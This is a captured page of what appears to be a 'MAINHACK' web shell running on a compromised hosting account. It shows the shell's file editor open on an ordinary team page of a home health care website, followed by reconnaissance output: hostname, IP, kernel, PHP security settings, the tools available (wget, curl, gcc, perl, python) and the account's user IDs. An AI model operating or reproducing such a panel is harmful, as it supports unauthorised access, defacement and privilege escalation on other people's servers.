[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: team.php
<?php include("header.php"); ?> <!-- // Header include --> <!-- Inner Banner Start --> <div class="inner-banner"> <img src="images/inner-banner.png" alt=""> <div class="container"> <h2>Our <span>Team</span></h2> </div> </div> <!-- Team Start --> <div class="team-start"> <div class="container"> <div class="row"> <div class="inner-team-box"> <div class="col-md-12 col-sm-12 col-xs-12"> <div class="team-content-dec"> <h3>Meet the Dedicated Team behind Our Mission</h3> <p>At HOME TEAM, our success is driven by the expertise, compassion, and dedication of our exceptional team. Get to know the individuals who work tirelessly to uphold our mission of Enhancing Lives Through Compassionate Home Health Care. From experienced medical professionals to compassionate caregivers, each member of our team plays a vital role in providing the highest quality care and support to our clients.</p> <!-- <img src="images/inner-about-8.png"> --> </div> </div> </div> </div> </div> </div> <!-- leadership-team --> <div class="leadership-team"> <div class="container"> <h2>Our leadership team</h2> <div class="row"> <?php $count=1; $sr='team'; $stmt =$show->readAll_clause($sr,'order by id asc'); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="col-md-6 col-sm-6 col-xs-12"> <div class="inner-leadership-box"> <div class="leadership-content-image"> <img src="<?=$pic_img?>/<?=$row['image']?>"> </div> <div class="leadership-content-dec"> <h4><?=$row['name']?></h4> <h5><i><?=$row['design']?></i></h5> <?=htmlspecialchars_decode($row['content'])?> </div> </div> </div> <?php } } ?> <p>At HOME TEAM, we pride ourselves on the diverse expertise and experiences that our team brings to the table. From medical breakthroughs to compassionate care, our professionals are united by a common goal: to improve the lives of those we serve. Each team member contributes their unique skills and perspectives, ensuring that our clients receive the comprehensive care they deserve.</p> </div> </div> </div> <!-- Footer include --> <?php include("footer.php"); ?> <!-- // Footer include -->
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.49 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619